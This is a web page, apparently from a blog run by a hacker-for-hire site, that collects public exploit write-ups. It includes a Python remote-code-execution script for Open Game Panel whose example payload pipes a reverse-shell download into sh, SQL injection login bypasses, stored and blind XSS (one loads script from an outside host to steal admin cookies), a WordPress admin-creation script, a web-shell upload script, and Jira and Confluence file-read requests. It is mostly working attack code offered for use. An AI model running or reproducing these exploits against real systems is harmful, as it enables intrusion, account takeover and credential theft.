Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863121307

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102

#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
 betwen ';', the user needs to be authenticated for this.


import requests

banner = """
@
@                                                     @@&    @@@@@/
@                                                      @&   #@@@@@&       .=
,/%@#
@                                                     @@@@@@@@@@@@@((%@@@@*
@                                                     #@@@@@@@@@@@@@@@*%@,
@                                                     @@@@@@@@@@@@@@&@@@@
@                                                    &@@@@@@@@@/   &@@@.
@                                                    @@@@@@@@@(
@                                                    @@@@@@@@@@@@@&*
@                                                     &@@@@@@@@@@@@@@@@%
@                                                        ,&@@@@@@@@@@@@@
@                                                          %@@@@@@@.
@                                              .%@@@@@@@@% @@@@@@
@                                          @@@@@#       .&@@@@#
@            (@@@@@@@@@@@.             .@@@&               @@%
@       .@@@@@,         #@@@@@*      #@@@                   @@@@@
@     @@@&                   &@@@.  @@@
@  ,@@@                         @@@@@@
@ @@@                            %@@@,
@&@@                              @@@,
@@@@
@@@@

 *@@@@@# @@  *@@  %@  @@@  @@      @@@@@/  @@@   @@@       ,@@@   ,@(    .@=
%
 *@/  @@ .@/ @(@  @@  @@@( @@         ,@(  @@@* @#@@       @@(@   ,@(    .@=
%
 *@@@@@@  @@ @ &&.@(  @@ @.@@       @@@@   @@.@(@ @@      (@. @@  ,@(    .@=
%
 *@/      %@(@  @@@   @@ *@@@          @@  @@ @@. @@      @@@@@@, ,@(    .@=
%
 *@/       @@*  @@@   @@  %@@      @@@@@*  @@     @@     &@    @@ ,@@@@@ .@=
@@@@

##You can get mod_id and home_id on your game panel URL when you are logged

"""
print(banner)

target = input("Target url:  (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")

url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
    requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
HireHackking 
# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
# Date: 04.10.2021
# Exploit Author: Blackhan
# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/grading_system/login.php
2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /grading_system/Actions.php?a=login HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
Connection: close

username=bypass'+or+1%3D1--+-&password=bypass
HireHackking 
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product.

The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--
HireHackking 
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:
Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and enter password test
Step 3 – Click on Sign in and capture the request in the Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1 
Step 5 – Click forward and now you will be logged in as an admin.

POC 

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
HireHackking 
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
	print("Author -> space_hen (www.github.com/spacehen)")
	
def print_usage():
	print("Usage: python3 exploit.py [target url]")
	print("Ex: python3 exploit.py https://example.com")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text
	if ("User name is required" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 2):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]

	ajax_action = 'tcp_register_and_login_ajax'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	data = {
	"tcp_new_user_name" : "admin_02",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "test@test.com",
	"tcp_role" : "administrator"
	}
	print("Inserting admin...");
	response = requests.post(uri, data=data )
	if (response.text == "\"\""):
		print("Success!")
		print("Now login at /wp-admin/")
	else:
		print(response.text)

main();
HireHackking 
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086

POC File #1 - web.xml

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


POC File #2 - seraph-config.xml

GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #3 - decorators.xml

GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


POC File #4 - /jira-webapp-dist/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #5 - /jira-webapp-dist/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #6 - /atlassian-jira-webapp/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #7 - /atlassian-jira-webapp/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
HireHackking 
# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26085

POC #1 - web.xml

GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #2 - seraph-config.xml

GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #3 - pom.properties

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #4 - pom.xml

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
HireHackking 
# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/mstore-api/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
# Version: 2.0.6, possibly higher
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("MStore API < 2.0.6 - Arbitrary File Upload")
	print("Author -> space_hen (www.github.com/spacehen)")
	
def print_usage():
	print("Usage: python3 exploit.py [target url] [shell path]")
	print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
	response = requests.post(uri)
	raw = response.text

	if ("Key must be" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	rest_url = '/wp-json/api/flutter_woo/config_file'

	uri = base + rest_url;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'file' : ( "config.json.php", open(file_path), "application/json" )}

	print("Uploading shell...");
	response = requests.post(uri, files=files )
	# response should be location of file
	print(response.text)

main();
HireHackking 
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
====================================================

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL

====================================================
HireHackking 
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <= 5.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md


'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible 
~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. 
This affects versions up to, and including, 5.1.
'''

'''
'Banner:
'''
banner = '''
  ______     _______     ____   ___ ____  _      _____ ___ _________ _____ 
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ // _ \___ /___ \___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / / 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /  
 \____|  \_/  |_____|   |_____|\___/_____|_|    |____/  /_/____/_____/_/   
                                                                           
                                * Sensitive information disclosure
                                @ Author: Ron Jost
'''
print(banner)


import argparse 
import requests

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
print('')
print('[*] Starting Exploit:')
print('')

paths = ["/wp-content/bps-backup/logs/db_backup_log.txt",  "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]

# Exploit
for pathadd in paths:
    x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
    print(x.text)
HireHackking 
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*
1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".

Request:
========

POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999
&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book


Now to confirm the vulnerability

3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
5) Able to steal admin's cookies successfully!!

#POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG
HireHackking 
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.

##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
   !!python/object/apply:os.system ["id;whoami"]
3.  Run the below command
   slo-generator migrate -b exploit.yaml
##############################################################################
HireHackking 
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection

# All requests can be sent by both an authenticated and a non-authenticated user

# Example vulnerable pages and parameters:

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  - firstname
  - lastname
  - username
  
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  - date_created
  - ticket_no
  - status
  - offense_id
  - fine
  - code
  - name

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Login request generate sql injection error

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=xxxx'&password=xxxx2'

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}

-----------------------------------------------------------------------------------------------------------------------
# Exploitable request - login parameter can be any value

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=admin&password=xxxx')+or+'1'='1'+and+('1

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
Logged as admin account

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Sql injection detection on the example of pages with the id parameter

# Login request generate sql error - add ' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
